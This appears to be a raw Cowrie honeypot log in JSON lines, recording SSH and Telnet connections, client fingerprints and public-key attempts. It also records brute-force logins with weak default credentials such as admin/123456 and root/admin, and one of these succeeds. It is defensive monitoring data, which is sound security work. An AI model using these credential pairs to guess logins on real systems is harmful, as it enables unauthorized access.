{"eventid":"cowrie.login.failed","username":"nobody","password":"qwerty","message":"login attempt [nobody/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T09:50:27.763491Z","src_ip":"212.227.235.229","session":"81548d7fcf5b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:50:29.023314Z","src_ip":"212.227.235.229","session":"81548d7fcf5b"}
{"eventid":"cowrie.session.connect","src_ip":"8.137.121.98","src_port":59450,"dst_ip":"1.2.3.4","dst_port":22,"session":"09a8e9a59427","protocol":"ssh","message":"New connection: 8.137.121.98:59450 (1.2.3.4:22) [session: 09a8e9a59427]","sensor":"my-vps","timestamp":"2025-09-09T09:51:34.356362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T09:51:34.363050Z","src_ip":"8.137.121.98","session":"09a8e9a59427"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T09:51:34.587095Z","src_ip":"8.137.121.98","session":"09a8e9a59427"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:51:42.358461Z","src_ip":"8.137.121.98","session":"09a8e9a59427"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35466,"dst_ip":"1.2.3.4","dst_port":22,"session":"52fc417b927d","protocol":"ssh","message":"New connection: 212.227.235.229:35466 (1.2.3.4:22) [session: 52fc417b927d]","sensor":"my-vps","timestamp":"2025-09-09T09:51:51.459063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:51:51.463734Z","src_ip":"212.227.235.229","session":"52fc417b927d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:51:51.569835Z","src_ip":"212.227.235.229","session":"52fc417b927d"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"password1","message":"login attempt [vagrant/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T09:51:51.996581Z","src_ip":"212.227.235.229","session":"52fc417b927d"}
{"eventid":"cowrie.session.connect","src_ip":"138.68.91.238","src_port":45712,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4965fb9abea","protocol":"ssh","message":"New connection: 138.68.91.238:45712 (1.2.3.4:22) [session: a4965fb9abea]","sensor":"my-vps","timestamp":"2025-09-09T09:51:52.192428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T09:51:52.213595Z","src_ip":"138.68.91.238","session":"a4965fb9abea"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T09:51:52.215178Z","src_ip":"138.68.91.238","session":"a4965fb9abea"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:51:53.096285Z","src_ip":"212.227.235.229","session":"52fc417b927d"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:52:00.218831Z","src_ip":"138.68.91.238","session":"a4965fb9abea"}
{"eventid":"cowrie.session.connect","src_ip":"103.107.97.234","src_port":49217,"dst_ip":"1.2.3.4","dst_port":23,"session":"262c7ea720b3","protocol":"telnet","message":"New connection: 103.107.97.234:49217 (1.2.3.4:23) [session: 262c7ea720b3]","sensor":"my-vps","timestamp":"2025-09-09T09:52:35.490251Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.107.97.234","src_port":49227,"dst_ip":"1.2.3.4","dst_port":23,"session":"d2f4926aa742","protocol":"telnet","message":"New connection: 103.107.97.234:49227 (1.2.3.4:23) [session: d2f4926aa742]","sensor":"my-vps","timestamp":"2025-09-09T09:52:36.165493Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.107.97.234","src_port":49240,"dst_ip":"1.2.3.4","dst_port":23,"session":"f2add4036708","protocol":"telnet","message":"New connection: 103.107.97.234:49240 (1.2.3.4:23) [session: f2add4036708]","sensor":"my-vps","timestamp":"2025-09-09T09:52:37.135854Z"}
{"eventid":"cowrie.session.closed","duration":31.102795362472534,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:53:06.592807Z","src_ip":"103.107.97.234","session":"262c7ea720b3"}
{"eventid":"cowrie.session.closed","duration":31.72501301765442,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:53:07.890440Z","src_ip":"103.107.97.234","session":"d2f4926aa742"}
{"eventid":"cowrie.session.closed","duration":31.55434536933899,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:53:08.690135Z","src_ip":"103.107.97.234","session":"f2add4036708"}
{"eventid":"cowrie.session.connect","src_ip":"103.107.97.234","src_port":52426,"dst_ip":"1.2.3.4","dst_port":23,"session":"c51e4f39ea25","protocol":"telnet","message":"New connection: 103.107.97.234:52426 (1.2.3.4:23) [session: c51e4f39ea25]","sensor":"my-vps","timestamp":"2025-09-09T09:54:38.434988Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43632,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba932dde6f94","protocol":"ssh","message":"New connection: 212.227.235.229:43632 (1.2.3.4:22) [session: ba932dde6f94]","sensor":"my-vps","timestamp":"2025-09-09T09:54:40.750843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:54:40.751954Z","src_ip":"212.227.235.229","session":"ba932dde6f94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:54:41.011312Z","src_ip":"212.227.235.229","session":"ba932dde6f94"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T09:54:42.060026Z","src_ip":"212.227.235.229","session":"ba932dde6f94"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:54:43.322971Z","src_ip":"212.227.235.229","session":"ba932dde6f94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35482,"dst_ip":"1.2.3.4","dst_port":22,"session":"77023b3172f4","protocol":"ssh","message":"New connection: 212.227.235.229:35482 (1.2.3.4:22) [session: 77023b3172f4]","sensor":"my-vps","timestamp":"2025-09-09T09:54:53.801267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:54:53.812999Z","src_ip":"212.227.235.229","session":"77023b3172f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:54:53.913188Z","src_ip":"212.227.235.229","session":"77023b3172f4"}
{"eventid":"cowrie.login.failed","username":"agouser","password":"123456","message":"login attempt [agouser/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T09:54:54.360088Z","src_ip":"212.227.235.229","session":"77023b3172f4"}
{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:54:54.776306Z","src_ip":"212.227.235.229","session":"19863da8522c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:54:55.459290Z","src_ip":"212.227.235.229","session":"77023b3172f4"}
{"eventid":"cowrie.session.closed","duration":30.936716556549072,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:55:09.371565Z","src_ip":"103.107.97.234","session":"c51e4f39ea25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59352,"dst_ip":"1.2.3.4","dst_port":22,"session":"4affc11d60fd","protocol":"ssh","message":"New connection: 212.227.235.229:59352 (1.2.3.4:22) [session: 4affc11d60fd]","sensor":"my-vps","timestamp":"2025-09-09T09:55:18.370953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:55:18.375832Z","src_ip":"212.227.235.229","session":"4affc11d60fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:55:18.640782Z","src_ip":"212.227.235.229","session":"4affc11d60fd"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123","message":"login attempt [steam/123] failed","sensor":"my-vps","timestamp":"2025-09-09T09:55:19.736870Z","src_ip":"212.227.235.229","session":"4affc11d60fd"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:55:21.012945Z","src_ip":"212.227.235.229","session":"4affc11d60fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50542,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4fc578b6b7b","protocol":"ssh","message":"New connection: 212.227.235.229:50542 (1.2.3.4:22) [session: d4fc578b6b7b]","sensor":"my-vps","timestamp":"2025-09-09T09:55:25.617048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T09:55:25.618311Z","src_ip":"212.227.235.229","session":"d4fc578b6b7b"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T09:55:25.718674Z","src_ip":"212.227.235.229","session":"d4fc578b6b7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50838,"dst_ip":"1.2.3.4","dst_port":23,"session":"0078440c4a18","protocol":"telnet","message":"New connection: 212.227.125.160:50838 (1.2.3.4:23) [session: 0078440c4a18]","sensor":"my-vps","timestamp":"2025-09-09T09:55:25.867076Z"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvCFB9wIg/ktecULO4CCaPdAAROKvR/o1iHt6HP5aAq5PwWci2DR2JqQI8FO8Sq4Irwiwn6TwFHt0IzxPqndyFmllhL2+1Ib6hTX19HEso4E7ocnte/cpx15en+NyHv0d+6BuatDJHeKrMLElmtf8dny9smb4BgG9SZggT5H6lIT55zTXNZMn0U1GUJz07WbUbAY/KO4ww5WKhmTEwEvHVkGODL3QwudpK8y6KEpyLW1A9JF30fq4SEazj7ZDRDnfCC4B7ZPaTUmBMYxP2OMZol4oBSZMB7Mc5n4wLzKhALGfX2HncCw6R/eqtw5ZXC3eQR3Ln730GKRdMKA+sJ3Cz","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","sensor":"my-vps","timestamp":"2025-09-09T09:55:25.926737Z","src_ip":"212.227.235.229","session":"d4fc578b6b7b"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvCFB9wIg/ktecULO4CCaPdAAROKvR/o1iHt6HP5aAq5PwWci2DR2JqQI8FO8Sq4Irwiwn6TwFHt0IzxPqndyFmllhL2+1Ib6hTX19HEso4E7ocnte/cpx15en+NyHv0d+6BuatDJHeKrMLElmtf8dny9smb4BgG9SZggT5H6lIT55zTXNZMn0U1GUJz07WbUbAY/KO4ww5WKhmTEwEvHVkGODL3QwudpK8y6KEpyLW1A9JF30fq4SEazj7ZDRDnfCC4B7ZPaTUmBMYxP2OMZol4oBSZMB7Mc5n4wLzKhALGfX2HncCw6R/eqtw5ZXC3eQR3Ln730GKRdMKA+sJ3Cz","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T09:55:25.927836Z","src_ip":"212.227.235.229","session":"d4fc578b6b7b"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:55:25.954293Z","src_ip":"212.227.125.160","session":"0078440c4a18"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:55:25.976099Z","src_ip":"212.227.125.160","session":"0078440c4a18"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvCFB9wIg/ktecULO4CCaPdAAROKvR/o1iHt6HP5aAq5PwWci2DR2JqQI8FO8Sq4Irwiwn6TwFHt0IzxPqndyFmllhL2+1Ib6hTX19HEso4E7ocnte/cpx15en+NyHv0d+6BuatDJHeKrMLElmtf8dny9smb4BgG9SZggT5H6lIT55zTXNZMn0U1GUJz07WbUbAY/KO4ww5WKhmTEwEvHVkGODL3QwudpK8y6KEpyLW1A9JF30fq4SEazj7ZDRDnfCC4B7ZPaTUmBMYxP2OMZol4oBSZMB7Mc5n4wLzKhALGfX2HncCw6R/eqtw5ZXC3eQR3Ln730GKRdMKA+sJ3Cz","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","sensor":"my-vps","timestamp":"2025-09-09T09:55:26.028684Z","src_ip":"212.227.235.229","session":"d4fc578b6b7b"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvCFB9wIg/ktecULO4CCaPdAAROKvR/o1iHt6HP5aAq5PwWci2DR2JqQI8FO8Sq4Irwiwn6TwFHt0IzxPqndyFmllhL2+1Ib6hTX19HEso4E7ocnte/cpx15en+NyHv0d+6BuatDJHeKrMLElmtf8dny9smb4BgG9SZggT5H6lIT55zTXNZMn0U1GUJz07WbUbAY/KO4ww5WKhmTEwEvHVkGODL3QwudpK8y6KEpyLW1A9JF30fq4SEazj7ZDRDnfCC4B7ZPaTUmBMYxP2OMZol4oBSZMB7Mc5n4wLzKhALGfX2HncCw6R/eqtw5ZXC3eQR3Ln730GKRdMKA+sJ3Cz","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T09:55:26.029459Z","src_ip":"212.227.235.229","session":"d4fc578b6b7b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58578,"dst_ip":"1.2.3.4","dst_port":22,"session":"d72ae04cffa2","protocol":"ssh","message":"New connection: 217.72.205.35:58578 (1.2.3.4:22) [session: d72ae04cffa2]","sensor":"my-vps","timestamp":"2025-09-09T09:55:30.673209Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:55:30.678681Z","src_ip":"217.72.205.35","session":"d72ae04cffa2"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:55:35.617220Z","src_ip":"212.227.235.229","session":"d4fc578b6b7b"}
